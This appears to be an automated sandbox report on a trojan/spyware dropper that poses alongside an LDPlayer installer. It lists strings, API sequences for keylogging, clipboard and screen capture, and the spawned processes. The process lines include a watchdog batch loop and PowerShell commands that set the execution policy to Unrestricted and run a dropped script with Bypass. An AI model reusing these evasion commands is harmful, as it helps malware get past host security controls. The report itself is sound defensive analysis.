                      Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: http://www.ijg.org
                      Source: powershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                      Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsofD
                      Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsofDSCResources55h
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://ldapi.ldmnq.com/common/baidu/ocpc
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://ldapi.ldmnq.com/common/baidu/ocpcbaidu
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://ldapi.ldmnq.com/mnq/properties?openid=&packageName=https://encdn.ldmnq.com/player_files/open
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://middledata.ldmnq.com/collection/biz/upload
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://middledata.ldmnq.com/collection/biz/uploadreport
                      Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://res.ldmnq.com/ld/leidianexhttps://res.ldmnq.com/download/release/ldinst4.0.exehttps://res.ld
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://www.ldmnq.com/?n=6120&bd_vid=logidUrlnewTypepost
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drString found in binary or memory: https://www.ldmnq.com/ldy/xukeXieyi.htmldownloader_jumplink_addresshttps://wpa1.qq.com/V7XjWRDy?_typ

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_037FE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_037FE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_037FE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_037FE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_037FE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_037FE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FBC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_037FBC70
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FE4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_037FE4F0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA86EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6CA86EB0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FB463 ExitWindowsEx,3_2_037FB463
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FB43F ExitWindowsEx,3_2_037FB43F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037FB41B ExitWindowsEx,3_2_037FB41B
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00404FAA0_2_00404FAA
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_0041206B0_2_0041206B
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_0041022D0_2_0041022D
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00411F910_2_00411F91
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F6EE03_2_037F6EE0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F6C503_2_037F6C50
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_038083813_2_03808381
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0380E3413_2_0380E341
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0380EA1D3_2_0380EA1D
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F89003_2_037F8900
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0380F9FF3_2_0380F9FF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0380D89F3_2_0380D89F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0380DDF03_2_0380DDF0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F24B03_2_037F24B0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA87E803_2_6CA87E80
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA925763_2_6CA92576
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAA0D623_2_6CAA0D62
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAB2ED33_2_6CAB2ED3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAA58B03_2_6CAA58B0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA928703_2_6CA92870
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA92A4B3_2_6CA92A4B
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA9DBA03_2_6CA9DBA0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA92BC63_2_6CA92BC6
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAB75023_2_6CAB7502
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA9C5153_2_6CA9C515
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA926383_2_6CA92638
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA876403_2_6CA87640
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA957A03_2_6CA957A0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CA927713_2_6CA92771
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6CAA62343_2_6CAA6234
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1001122F3_2_1001122F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_100024B03_2_100024B0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10010CDE3_2_10010CDE
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10012D913_2_10012D91
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10011E5C3_2_10011E5C
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1000B66A3_2_1000B66A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_100117803_2_10011780
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C700323_2_00C70032
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C812063_2_00C81206
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C724873_2_00C72487
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C80CB53_2_00C80CB5
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C82D683_2_00C82D68
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C7B6413_2_00C7B641
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00C817573_2_00C81757
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0368F3BE3_2_0368F3BE
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0368D25E3_2_0368D25E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_036782BF3_2_036782BF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0367689F3_2_0367689F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0368D7AF3_2_0368D7AF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03671E6F3_2_03671E6F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0367660F3_2_0367660F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03687D403_2_03687D40
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0368DD003_2_0368DD00
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Bilite\Axialis\Update.exe 0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 03804300 appears 31 times
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6CA9C970 appears 53 times
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: String function: 0040243B appears 37 times
                      Source: Uulw5M1DfU.exeStatic PE information: invalid certificate
                      Source: ldplayer9_ld_6000_ld.exe.0.drStatic PE information: Resource name: ZIPRES type: 7-zip archive data, version 0.4
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1666390584.000000000243D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1666390584.000000000243D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7zSfxNew.exe< vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zSfxNew.exe< vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAxII> vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exeBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exeBinary or memory string: OriginalFilename7zSfxNew.exe< vs Uulw5M1DfU.exe
                      Source: Uulw5M1DfU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/29@0/1
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F7B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_037F7B70
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F7740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_037F7740
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F7620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,3_2_037F7620
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_037F6050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,3_2_037F6050
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeFile created: C:\Users\Public\BiliteJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.13
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                      Source: Uulw5M1DfU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;UPDATE.EXE&apos;
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Uulw5M1DfU.exeReversingLabs: Detection: 47%
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeFile read: C:\Users\user\Desktop\Uulw5M1DfU.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Uulw5M1DfU.exe "C:\Users\user\Desktop\Uulw5M1DfU.exe"
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exe
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
